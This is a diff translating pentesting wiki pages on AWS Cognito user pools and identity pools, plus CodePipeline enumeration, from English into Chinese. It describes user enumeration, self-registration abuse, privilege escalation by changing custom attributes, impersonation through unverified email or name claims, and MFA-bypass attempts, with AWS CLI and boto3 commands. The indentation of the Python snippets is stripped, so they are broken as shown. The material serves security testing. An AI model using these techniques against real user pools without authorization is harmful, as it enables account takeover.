     --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 
> [!WARNING] -> It's possible to **configure different IAM roles depending on the identity provide**r the user is being logged in or even just depending **on the user** (using claims). Therefore, if you have access to different users through the same or different providers, if might be **worth it to login and access the IAM roles of all of them**. +> 可以 **根据用户登录的身份提供者** 配置不同的 IAM 角色,甚至仅仅根据 **用户**(使用声明)。因此,如果您通过相同或不同的提供者访问不同的用户,可能 **值得登录并访问他们所有的 IAM 角色**。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md index 08e06fb45..03e6dae33 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md @@ -1,33 +1,32 @@ -# Cognito User Pools +# Cognito 用户池 {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK. +用户池是 Amazon Cognito 中的用户目录。通过用户池,您的用户可以通过 Amazon Cognito **登录到您的网页或移动应用**,**或通过** **第三方** 身份提供者 (IdP) 进行联合身份验证。无论您的用户是直接登录还是通过第三方,所有用户池的成员都有一个可以通过 SDK 访问的目录配置文件。 -User pools provide: +用户池提供: -- Sign-up and sign-in services. -- A built-in, customizable web UI to sign in users. -- Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool. -- User directory management and user profiles. -- Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification. -- Customized workflows and user migration through AWS Lambda triggers. +- 注册和登录服务。 +- 内置的、可自定义的网页用户界面以登录用户。 +- 通过 Facebook、Google、Amazon 登录和 Apple 登录的社交登录,以及通过用户池中的 SAML 和 OIDC 身份提供者。 +- 用户目录管理和用户配置文件。 +- 安全功能,如多因素身份验证 (MFA)、对被泄露凭证的检查、账户接管保护,以及电话和电子邮件验证。 +- 通过 AWS Lambda 触发器自定义工作流和用户迁移。 -**Source code** of applications will usually also contain the **user pool ID** and the **client application ID**, (and some times the **application secret**?) which are needed for a **user to login** to a Cognito User Pool. +**应用程序的源代码** 通常还会包含 **用户池 ID** 和 **客户端应用程序 ID**(有时还有 **应用程序密钥**?),这些都是 **用户登录** Cognito 用户池所需的。 -### Potential attacks +### 潜在攻击 -- **Registration**: By default a user can register himself, so he could create a user for himself. -- **User enumeration**: The registration functionality can be used to find usernames that already exists. This information can be useful for the brute-force attack. -- **Login brute-force**: In the [**Authentication**](cognito-user-pools.md#authentication) section you have all the **methods** that a user have to **login**, you could try to brute-force them **find valid credentials**. +- **注册**:默认情况下,用户可以自我注册,因此他可以为自己创建一个用户。 +- **用户枚举**:注册功能可用于查找已存在的用户名。这些信息对于暴力破解攻击可能很有用。 +- **登录暴力破解**:在 [**身份验证**](cognito-user-pools.md#authentication) 部分,您可以找到用户 **登录** 的所有 **方法**,您可以尝试暴力破解它们以 **找到有效凭证**。 -### Tools for pentesting - -- [Pacu](https://github.com/RhinoSecurityLabs/pacu), now includes the `cognito__enum` and `cognito__attack` modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.\ - For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. +### 渗透测试工具 +- [Pacu](https://github.com/RhinoSecurityLabs/pacu),现在包括 `cognito__enum` 和 `cognito__attack` 模块,这些模块自动枚举账户中的所有 Cognito 资产并标记弱配置、用于访问控制的用户属性等,同时还自动创建用户(包括 MFA 支持)和基于可修改自定义属性、可用身份池凭证、可假设角色的 ID 令牌等的权限提升。\ +有关模块功能的描述,请参见 [博客文章](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2) 的第 2 部分。有关安装说明,请参见主 [Pacu](https://github.com/RhinoSecurityLabs/pacu) 页面。 ```bash # Run cognito__enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account Pacu (new:test) > run cognito__enum @@ -37,201 +36,169 @@ Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gma us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` - -- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and account oracle. Check [this link](https://github.com/padok-team/cognito-scanner) for more info. - +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) 是一个用 Python 编写的 CLI 工具,实施对 Cognito 的不同攻击,包括不必要的账户创建和账户 oracle。有关更多信息,请查看 [this link](https://github.com/padok-team/cognito-scanner)。 ```bash # Install pip install cognito-scanner # Run cognito-scanner --help ``` - -- [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): This script allows to enumerate valid attributes for users. - +- [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): 该脚本允许枚举用户的有效属性。 ```bash python cognito-attribute-enu.py -client_id 16f1g98bfuj9i0g3f8be36kkrl ``` +## 注册 -## Registration - -User Pools allows by **default** to **register new users**. - +用户池默认允许**注册新用户**。 ```bash aws cognito-idp sign-up --client-id \ - --username --password \ - --region --no-sign-request +--username --password \ +--region --no-sign-request ``` +#### 如果任何人都可以注册 -#### If anyone can register - -You might find an error indicating you that you need to **provide more details** of abut the user: - +您可能会发现一个错误,指示您需要**提供更多关于用户的详细信息**: ``` An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: address: The attribute is required ``` - -You can provide the needed details with a JSON such as: - +您可以提供所需的详细信息,格式为 JSON,例如: ```json --user-attributes '[{"Name": "email", "Value": "carlospolop@gmail.com"}, {"Name":"gender", "Value": "M"}, {"Name": "address", "Value": "street"}, {"Name": "custom:custom_name", "Value":"supername&\"*$"}]' ``` - -You could use this functionality also to **enumerate existing users.** This is the error message when a user already exists with that name: - +您还可以使用此功能来**枚举现有用户。** 当已存在该名称的用户时,错误消息为: ``` An error occurred (UsernameExistsException) when calling the SignUp operation: User already exists ``` - > [!NOTE] -> Note in the previous command how the **custom attributes start with "custom:"**.\ -> Also know that when registering you **cannot create for the user new custom attributes**. You can only give value to **default attributes** (even if they aren't required) and **custom attributes specified**. - -Or just to test if a client id exists. This is the error if the client-id doesn't exist: +> 注意在之前的命令中,**自定义属性以 "custom:" 开头**。\ +> 还要知道,在注册时,您**无法为用户创建新的自定义属性**。您只能为**默认属性**(即使它们不是必需的)和**指定的自定义属性**赋值。 +或者只是测试客户端 ID 是否存在。如果客户端 ID 不存在,则会出现此错误: ``` An error occurred (ResourceNotFoundException) when calling the SignUp operation: User pool client 3ig612gjm56p1ljls1prq2miut does not exist. ``` +#### 如果只有管理员可以注册用户 -#### If only admin can register users - -You will find this error and you own't be able to register or enumerate users: - +您将发现此错误,您将无法注册或枚举用户: ``` An error occurred (NotAuthorizedException) when calling the SignUp operation: SignUp is not permitted for this user pool ``` +### 验证注册 -### Verifying Registration - -Cognito allows to **verify a new user by verifying his email or phone number**. Therefore, when creating a user usually you will be required at least the username and password and the **email and/or telephone number**. Just set one **you control** so you will receive the code to **verify your** newly created user **account** like this: - +Cognito 允许通过验证**电子邮件或电话号码**来**验证新用户**。因此,在创建用户时,通常至少需要用户名和密码,以及**电子邮件和/或电话号码**。只需设置一个**您控制的**,这样您就会收到代码来**验证您的**新创建的用户**帐户**,如下所示: ```bash aws cognito-idp confirm-sign-up --client-id \ - --username aasdasd2 --confirmation-code \ - --no-sign-request --region us-east-1 +--username aasdasd2 --confirmation-code \ +--no-sign-request --region us-east-1 ``` - > [!WARNING] -> Even if **looks like you can use the same email** and phone number, when you need to verify the created user Cognito will complain about using the same info and **won't let you verify the account**. +> 即使**看起来你可以使用相同的电子邮件**和电话号码,当你需要验证创建的用户时,Cognito会抱怨使用相同的信息,并且**不会让你验证账户**。 -### Privilege Escalation / Updating Attributes - -By default a user can **modify the value of his attributes** with something like: +### 权限提升 / 更新属性 +默认情况下,用户可以**修改其属性的值**,使用类似于: ```bash aws cognito-idp update-user-attributes \ - --region us-east-1 --no-sign-request \ - --user-attributes Name=address,Value=street \ - --access-token +--region us-east-1 --no-sign-request \ +--user-attributes Name=address,Value=street \ +--access-token ``` - -#### Custom attribute privesc +#### 自定义属性权限提升 > [!CAUTION] -> You might find **custom attributes** being used (such as `isAdmin`), as by default you can **change the values of your own attributes** you might be able to **escalate privileges** changing the value yourself! +> 你可能会发现使用了**自定义属性**(例如`isAdmin`),因为默认情况下你可以**更改自己属性的值**,你可能能够**通过自己更改值来提升权限**! -#### Email/username modification privesc +#### 邮箱/用户名修改权限提升 -You can use this to **modify the email and phone number** of a user, but then, even if the account remains as verified, those attributes are **set in unverified status** (you need to verify them again). +你可以用这个来**修改用户的邮箱和电话号码**,但即使账户仍然被验证,这些属性也会被**设置为未验证状态**(你需要再次验证它们)。 > [!WARNING] -> You **won't be able to login with email or phone number** until you verify them, but you will be **able to login with the username**.\ -> Note that even if the email was modified and not verified it will appear in the ID Token inside the **`email`** **field** and the filed **`email_verified`** will be **false**, but if the app **isn't checking that you might impersonate other users**. +> 你**无法使用邮箱或电话号码登录**,直到你验证它们,但你可以**使用用户名登录**。\ +> 请注意,即使邮箱被修改且未验证,它仍会出现在ID Token中的**`email`** **字段**,而字段**`email_verified`**将为**false**,但如果应用**没有检查**这一点,你可能会冒充其他用户。 -> Moreover, note that you can put anything inside the **`name`** field just modifying the **name attribute**. If an app is **checking** **that** field for some reason **instead of the `email`** (or any other attribute) you might be able to **impersonate other users**. - -Anyway, if for some reason you changed your email for example to a new one you can access you can **confirm the email with the code you received in that email address**: +> 此外,请注意,你可以在**`name`**字段中放入任何内容,只需修改**name属性**。如果某个应用**出于某种原因检查**该字段而不是`email`(或任何其他属性),你可能能够**冒充其他用户**。 +无论如何,如果出于某种原因你将邮箱更改为你可以访问的新邮箱,你可以**使用你在该邮箱地址收到的代码确认邮箱**: ```bash aws cognito-idp verify-user-attribute \ - --access-token \ - --attribute-name email --code \ - --region --no-sign-request +--access-token \ +--attribute-name email --code \ +--region --no-sign-request ``` - -Use **`phone_number`** instead of **`email`** to change/verify a **new phone number**. +使用 **`phone_number`** 而不是 **`email`** 来更改/验证 **新电话号码**。 > [!NOTE] -> The admin could also enable the option to **login with a user preferred username**. Note that you won't be able to change this value to **any username or preferred_username already being used** to impersonate a different user. +> 管理员还可以启用 **使用用户首选用户名登录** 的选项。请注意,您将无法将此值更改为 **任何已被使用的用户名或首选用户名** 以冒充其他用户。 -### Recover/Change Password - -It's possible to recover a password just **knowing the username** (or email or phone is accepted) and having access to it as a code will be sent there: +### 恢复/更改密码 +只需 **知道用户名**(或电子邮件或电话也可以接受)并且能够访问它,因为代码将发送到那里: ```bash aws cognito-idp forgot-password \ - --client-id \ - --username --region +--client-id \ +--username --region ``` - > [!NOTE] -> The response of the server is always going to be positive, like if the username existed. You cannot use this method to enumerate users - -With the code you can change the password with: +> 服务器的响应总是会是积极的,比如用户名存在。您无法使用此方法枚举用户 +使用代码可以更改密码: ```bash aws cognito-idp confirm-forgot-password \ - --client-id \ - --username \ - --confirmation-code \ - --password --region +--client-id \ +--username \ +--confirmation-code \ +--password --region ``` - -To change the password you need to **know the previous password**: - +要更改密码,您需要**知道之前的密码**: ```bash aws cognito-idp change-password \ - --previous-password \ - --proposed-password \ - --access-token +--previous-password \ +--proposed-password \ +--access-token ``` +## 认证 -## Authentication +用户池支持**不同的认证方式**。如果您有**用户名和密码**,也支持**不同的方法**进行登录。\ +此外,当用户在池中被认证时,**会发放3种类型的令牌**:**ID令牌**、**访问令牌**和**刷新令牌**。 -A user pool supports **different ways to authenticate** to it. If you have a **username and password** there are also **different methods** supported to login.\ -Moreover, when a user is authenticated in the Pool **3 types of tokens are given**: The **ID Token**, the **Access token** and the **Refresh token**. - -- [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): It contains claims about the **identity of the authenticated user,** such as `name`, `email`, and `phone_number`. The ID token can also be used to **authenticate users to your resource servers or server applications**. You must **verify** the **signature** of the ID token before you can trust any claims inside the ID token if you use it in external applications. - - The ID Token is the token that **contains the attributes values of the user**, even the custom ones. -- [**Access Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): It contains claims about the authenticated user, a list of the **user's groups, and a list of scopes**. The purpose of the access token is to **authorize API operations** in the context of the user in the user pool. For example, you can use the access token to **grant your user access** to add, change, or delete user attributes. -- [**Refresh Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): With refresh tokens you can **get new ID Tokens and Access Tokens** for the user until the **refresh token is invalid**. By **default**, the refresh token **expires 30 days after** your application user signs into your user pool. When you create an application for your user pool, you can set the application's refresh token expiration to **any value between 60 minutes and 10 years**. +- [**ID令牌**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html):它包含关于**已认证用户身份**的声明,例如`name`、`email`和`phone_number`。ID令牌也可以用于**对您的资源服务器或服务器应用程序进行用户认证**。如果您在外部应用程序中使用ID令牌,您必须**验证**ID令牌的**签名**,才能信任ID令牌中的任何声明。 +- ID令牌是**包含用户属性值**的令牌,甚至包括自定义属性。 +- [**访问令牌**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html):它包含关于已认证用户的声明、**用户组列表**和**作用域列表**。访问令牌的目的是在用户池中**授权API操作**。例如,您可以使用访问令牌**授予用户访问**添加、修改或删除用户属性的权限。 +- [**刷新令牌**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html):使用刷新令牌,您可以为用户**获取新的ID令牌和访问令牌**,直到**刷新令牌失效**。默认情况下,刷新令牌**在应用程序用户登录用户池后30天过期**。当您为用户池创建应用程序时,可以将应用程序的刷新令牌过期时间设置为**60分钟到10年之间的任何值**。 ### ADMIN_NO_SRP_AUTH & ADMIN_USER_PASSWORD_AUTH -This is the server side authentication flow: +这是服务器端认证流程: -- The server-side app calls the **`AdminInitiateAuth` API operation** (instead of `InitiateAuth`). This operation requires AWS credentials with permissions that include **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**. The operation returns the required authentication parameters. -- After the server-side app has the **authentication parameters**, it calls the **`AdminRespondToAuthChallenge` API operation**. The `AdminRespondToAuthChallenge` API operation only succeeds when you provide AWS credentials. +- 服务器端应用程序调用**`AdminInitiateAuth` API操作**(而不是`InitiateAuth`)。此操作需要具有包括**`cognito-idp:AdminInitiateAuth`**和**`cognito-idp:AdminRespondToAuthChallenge`**权限的AWS凭证。该操作返回所需的认证参数。 +- 在服务器端应用程序获得**认证参数**后,它调用**`AdminRespondToAuthChallenge` API操作**。只有在提供AWS凭证时,`AdminRespondToAuthChallenge` API操作才会成功。 -This **method is NOT enabled** by default. +此**方法默认情况下未启用**。 -To **login** you **need** to know: +要**登录**,您**需要**知道: -- user pool id -- client id -- username -- password -- client secret (only if the app is configured to use a secret) +- 用户池ID +- 客户端ID +- 用户名 +- 密码 +- 客户端密钥(仅在应用程序配置为使用密钥时) > [!NOTE] -> In order to be **able to login with this method** that application must allow to login with `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\ -> Moreover, to perform this action you need credentials with the permissions **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`** - +> 为了**能够使用此方法登录**,该应用程序必须允许使用`ALLOW_ADMIN_USER_PASSWORD_AUTH`进行登录。\ +> 此外,要执行此操作,您需要具有**`cognito-idp:AdminInitiateAuth`**和**`cognito-idp:AdminRespondToAuthChallenge`**权限的凭证。 ```python aws cognito-idp admin-initiate-auth \ - --client-id \ - --auth-flow ADMIN_USER_PASSWORD_AUTH \ - --region \ - --auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' - --user-pool-id "" +--client-id \ +--auth-flow ADMIN_USER_PASSWORD_AUTH \ +--region \ +--auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' +--user-pool-id "" # Check the python code to learn how to generate the hsecret_hash ``` -
-Code to Login - +登录代码 ```python import boto3 import botocore @@ -249,61 +216,57 @@ password = "" boto_client = boto3.client('cognito-idp', region_name='us-east-1') def get_secret_hash(username, client_id, client_secret): - key = bytes(client_secret, 'utf-8') - message = bytes(f'{username}{client_id}', 'utf-8') - return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode() +key = bytes(client_secret, 'utf-8') +message = bytes(f'{username}{client_id}', 'utf-8') +return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode() # If the Client App isn't configured to use a secret ## just delete the line setting the SECRET_HASH def login_user(username_or_alias, password, client_id, client_secret, user_pool_id): - try: - return boto_client.admin_initiate_auth( - UserPoolId=user_pool_id, - ClientId=client_id, - AuthFlow='ADMIN_USER_PASSWORD_AUTH', - AuthParameters={ - 'USERNAME': username_or_alias, - 'PASSWORD': password, - 'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) - } - ) - except botocore.exceptions.ClientError as e: - return e.response +try: +return boto_client.admin_initiate_auth( +UserPoolId=user_pool_id, +ClientId=client_id, +AuthFlow='ADMIN_USER_PASSWORD_AUTH', +AuthParameters={ +'USERNAME': username_or_alias, +'PASSWORD': password, +'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) +} +) +except botocore.exceptions.ClientError as e: +return e.response print(login_user(username, password, client_id, client_secret, user_pool_id)) ``` -
### USER_PASSWORD_AUTH -This method is another simple and **traditional user & password authentication** flow. It's recommended to **migrate a traditional** authentication method **to Cognito** and **recommended** to then **disable** it and **use** then **ALLOW_USER_SRP_AUTH** method instead (as that one never sends the password over the network).\ -This **method is NOT enabled** by default. +此方法是另一种简单的**传统用户和密码认证**流程。建议将**传统**认证方法**迁移到Cognito**,并建议随后**禁用**它,改为使用**ALLOW_USER_SRP_AUTH**方法(因为该方法从不通过网络发送密码)。\ +此**方法默认情况下未启用**。 -The main **difference** with the **previous auth method** inside the code is that you **don't need to know the user pool ID** and that you **don't need extra permissions** in the Cognito User Pool. +与代码中的**前一种认证方法**的主要**区别**在于您**不需要知道用户池ID**,并且您**不需要额外的权限**在Cognito用户池中。 -To **login** you **need** to know: +要**登录**,您**需要**知道: -- client id -- username -- password -- client secret (only if the app is configured to use a secret) +- 客户端ID +- 用户名 +- 密码 +- 客户端密钥(仅在应用程序配置为使用密钥时) > [!NOTE] -> In order to be **able to login with this method** that application must allow to login with ALLOW_USER_PASSWORD_AUTH. - +> 为了**能够使用此方法登录**,该应用程序必须允许使用ALLOW_USER_PASSWORD_AUTH登录。 ```python aws cognito-idp initiate-auth --client-id \ - --auth-flow USER_PASSWORD_AUTH --region \ - --auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' +--auth-flow USER_PASSWORD_AUTH --region \ +--auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' # Check the python code to learn how to generate the secret_hash ``` -
-Python code to Login - +用于登录的Python代码 ```python import boto3 import botocore @@ -321,48 +284,46 @@ password = "" boto_client = boto3.client('cognito-idp', region_name='us-east-1') def get_secret_hash(username, client_id, client_secret): - key = bytes(client_secret, 'utf-8') - message = bytes(f'{username}{client_id}', 'utf-8') - return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode() +key = bytes(client_secret, 'utf-8') +message = bytes(f'{username}{client_id}', 'utf-8') +return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode() # If the Client App isn't configured to use a secret ## just delete the line setting the SECRET_HASH def login_user(username_or_alias, password, client_id, client_secret, user_pool_id): - try: - return boto_client.initiate_auth( - ClientId=client_id, - AuthFlow='ADMIN_USER_PASSWORD_AUTH', - AuthParameters={ - 'USERNAME': username_or_alias, - 'PASSWORD': password, - 'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) - } - ) - except botocore.exceptions.ClientError as e: - return e.response +try: +return boto_client.initiate_auth( +ClientId=client_id, +AuthFlow='ADMIN_USER_PASSWORD_AUTH', +AuthParameters={ +'USERNAME': username_or_alias, +'PASSWORD': password, +'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) +} +) +except botocore.exceptions.ClientError as e: +return e.response print(login_user(username, password, client_id, client_secret, user_pool_id)) ``` -
### USER_SRP_AUTH -This is scenario is similar to the previous one but **instead of of sending the password** through the network to login a **challenge authentication is performed** (so no password navigating even encrypted through he net).\ -This **method is enabled** by default. +这个场景与之前的类似,但**不是通过网络发送密码**来登录,而是**执行挑战认证**(因此没有密码即使加密后也不会在网络中传输)。\ +这个**方法是默认启用**的。 -To **login** you **need** to know: +要**登录**,您**需要**知道: -- user pool id -- client id -- username -- password -- client secret (only if the app is configured to use a secret) +- 用户池 ID +- 客户端 ID +- 用户名 +- 密码 +- 客户端密钥(仅在应用程序配置为使用密钥时)
-Code to login - +登录代码 ```python from warrant.aws_srp import AWSSRP import os @@ -375,32 +336,28 @@ CLIENT_SECRET = 'secreeeeet' os.environ["AWS_DEFAULT_REGION"] = "" aws = AWSSRP(username=USERNAME, password=PASSWORD, pool_id=POOL_ID, - client_id=CLIENT_ID, client_secret=CLIENT_SECRET) +client_id=CLIENT_ID, client_secret=CLIENT_SECRET) tokens = aws.authenticate_user() id_token = tokens['AuthenticationResult']['IdToken'] refresh_token = tokens['AuthenticationResult']['RefreshToken'] access_token = tokens['AuthenticationResult']['AccessToken'] token_type = tokens['AuthenticationResult']['TokenType'] ``` -
### REFRESH_TOKEN_AUTH & REFRESH_TOKEN -This **method is always going to be valid** (it cannot be disabled) but you need to have a valid refresh token. - +此**方法始终有效**(无法禁用),但您需要拥有有效的刷新令牌。 ```bash aws cognito-idp initiate-auth \ - --client-id 3ig6h5gjm56p1ljls1prq2miut \ - --auth-flow REFRESH_TOKEN_AUTH \ - --region us-east-1 \ - --auth-parameters 'REFRESH_TOKEN=' +--client-id 3ig6h5gjm56p1ljls1prq2miut \ +--auth-flow REFRESH_TOKEN_AUTH \ +--region us-east-1 \ +--auth-parameters 'REFRESH_TOKEN=' ``` -
-Code to refresh - +刷新代码 ```python import boto3 import botocore @@ -414,83 +371,74 @@ token = '' boto_client = boto3.client('cognito-idp', region_name='') def refresh(client_id, refresh_token): - try: - return boto_client.initiate_auth( - ClientId=client_id, - AuthFlow='REFRESH_TOKEN_AUTH', - AuthParameters={ - 'REFRESH_TOKEN': refresh_token - } - ) - except botocore.exceptions.ClientError as e: - return e.response +try: +return boto_client.initiate_auth( +ClientId=client_id, +AuthFlow='REFRESH_TOKEN_AUTH', +AuthParameters={ +'REFRESH_TOKEN': refresh_token +} +) +except botocore.exceptions.ClientError as e: +return e.response print(refresh(client_id, token)) ``` -
### CUSTOM_AUTH -In this case the **authentication** is going to be performed through the **execution of a lambda function**. +在这种情况下,**身份验证**将通过**执行一个lambda函数**来进行。 -## Extra Security +## 额外安全性 -### Advanced Security +### 高级安全性 -By default it's disabled, but if enabled, Cognito could be able to **find account takeovers**. To minimise the probability you should login from a **network inside the same city, using the same user agent** (and IP is thats possible)**.** +默认情况下是禁用的,但如果启用,Cognito可能能够**发现账户接管**。为了最小化这种可能性,您应该从**同一城市的网络登录,使用相同的用户代理**(如果可能的话,使用相同的IP)。 -### **MFA Remember device** +### **MFA 记住设备** -If the user logins from the same device, the MFA might be bypassed, therefore try to login from the same browser with the same metadata (IP?) to try to bypass the MFA protection. +如果用户从同一设备登录,MFA可能会被绕过,因此尝试从相同的浏览器和相同的元数据(IP?)登录,以尝试绕过MFA保护。 -## User Pool Groups IAM Roles +## 用户池组 IAM 角色 -It's possible to add **users to User Pool** groups that are related to one **IAM roles**.\ -Moreover, **users** can be assigned to **more than 1 group with different IAM roles** attached. +可以将**用户添加到与一个**IAM角色**相关的用户池组中。\ +此外,**用户**可以被分配到**多个具有不同IAM角色**的组中。 -Note that even if a group is inside a group with an IAM role attached, in order to be able to access IAM credentials of that group it's needed that the **User Pool is trusted by an Identity Pool** (and know the details of that Identity Pool). +请注意,即使一个组在一个附有IAM角色的组内,要能够访问该组的IAM凭证,需要**用户池被身份池信任**(并了解该身份池的详细信息)。 -Another requisite to get the **IAM role indicated in the IdToken** when a user is authenticated in the User Pool (`aws cognito-idp initiate-auth...`) is that the **Identity Provider Authentication provider** needs indicate that the **role must be selected from the token.** +另一个要求是在用户在用户池中经过身份验证时获取**IdToken中指示的IAM角色**(`aws cognito-idp initiate-auth...`),即**身份提供者身份验证提供者**需要指示**角色必须从令牌中选择**。
-The **roles** a user have access to are **inside the `IdToken`**, and a user can **select which role he would like credentials for** with the **`--custom-role-arn`** from `aws cognito-identity get-credentials-for-identity`.\ -However, if the **default option** is the one **configured** (`use default role`), and you try to access a role from the IdToken, you will get **error** (that's why the previous configuration is needed): - +用户可以访问的**角色**在**`IdToken`**中,用户可以使用`aws cognito-identity get-credentials-for-identity`中的**`--custom-role-arn`**选择他希望获取凭证的**角色**。\ +然而,如果**默认选项**是**配置的**(`使用默认角色`),并且您尝试从IdToken访问一个角色,您将会得到**错误**(这就是为什么需要之前的配置): ``` An error occurred (InvalidParameterException) when calling the GetCredentialsForIdentity operation: Only SAML providers and providers with RoleMappings support custom role ARN. ``` - > [!WARNING] -> Note that the role assigned to a **User Pool Group** needs to be **accesible by the Identity Provider** that **trust the User Pool** (as the IAM role **session credentials are going to be obtained from it**). - +> 请注意,分配给 **用户池组** 的角色需要 **被信任用户池的身份提供者可访问**(因为 IAM 角色 **会话凭证将从中获取**)。 ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "cognito-identity.amazonaws.com" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "cognito-identity.amazonaws.com:aud": "us-east-1:2361092e-9db6-a876-1027-10387c9de439" - }, - "ForAnyValue:StringLike": { - "cognito-identity.amazonaws.com:amr": "authenticated" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"Federated": "cognito-identity.amazonaws.com" +}, +"Action": "sts:AssumeRoleWithWebIdentity", +"Condition": { +"StringEquals": { +"cognito-identity.amazonaws.com:aud": "us-east-1:2361092e-9db6-a876-1027-10387c9de439" +}, +"ForAnyValue:StringLike": { +"cognito-identity.amazonaws.com:amr": "authenticated" +} +} +} +] }js ``` - {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md index 2a907b71b..2d4d40978 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md @@ -4,30 +4,28 @@ ## DataPipeline -AWS Data Pipeline is designed to facilitate the **access, transformation, and efficient transfer** of data at scale. It allows the following operations to be performed: +AWS Data Pipeline 旨在促进 **数据的访问、转换和高效传输**。它允许执行以下操作: -1. **Access Your Data Where It’s Stored**: Data residing in various AWS services can be accessed seamlessly. -2. **Transform and Process at Scale**: Large-scale data processing and transformation tasks are handled efficiently. -3. **Efficiently Transfer Results**: The processed data can be efficiently transferred to multiple AWS services including: - - Amazon S3 - - Amazon RDS - - Amazon DynamoDB - - Amazon EMR +1. **访问存储的数据**:可以无缝访问存储在各种 AWS 服务中的数据。 +2. **大规模转换和处理**:高效处理大规模数据处理和转换任务。 +3. **高效传输结果**:处理后的数据可以高效地传输到多个 AWS 服务,包括: +- Amazon S3 +- Amazon RDS +- Amazon DynamoDB +- Amazon EMR -In essence, AWS Data Pipeline streamlines the movement and processing of data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals. +本质上,AWS Data Pipeline 简化了在指定时间间隔内不同 AWS 计算和存储服务以及本地数据源之间的数据移动和处理。 ### Enumeration - ```bash aws datapipeline list-pipelines aws datapipeline describe-pipelines --pipeline-ids aws datapipeline list-runs --pipeline-id aws datapipeline get-pipeline-definition --pipeline-id ``` - ### Privesc -In the following page you can check how to **abuse datapipeline permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用datapipeline权限以提升特权**: {{#ref}} ../aws-privilege-escalation/aws-datapipeline-privesc.md @@ -35,10 +33,9 @@ In the following page you can check how to **abuse datapipeline permissions to e ## CodePipeline -AWS CodePipeline is a fully managed **continuous delivery service** that helps you **automate your release pipelines** for fast and reliable application and infrastructure updates. CodePipeline automates the **build, test, and deploy phases** of your release process every time there is a code change, based on the release model you define. +AWS CodePipeline 是一个完全托管的**持续交付服务**,帮助您**自动化发布管道**,以快速和可靠地更新应用程序和基础设施。CodePipeline 每次代码更改时,基于您定义的发布模型,自动化**构建、测试和部署阶段**的发布过程。 ### Enumeration - ```bash aws codepipeline list-pipelines aws codepipeline get-pipeline --name @@ -47,10 +44,9 @@ aws codepipeline list-pipeline-executions --pipeline-name aws codepipeline list-webhooks 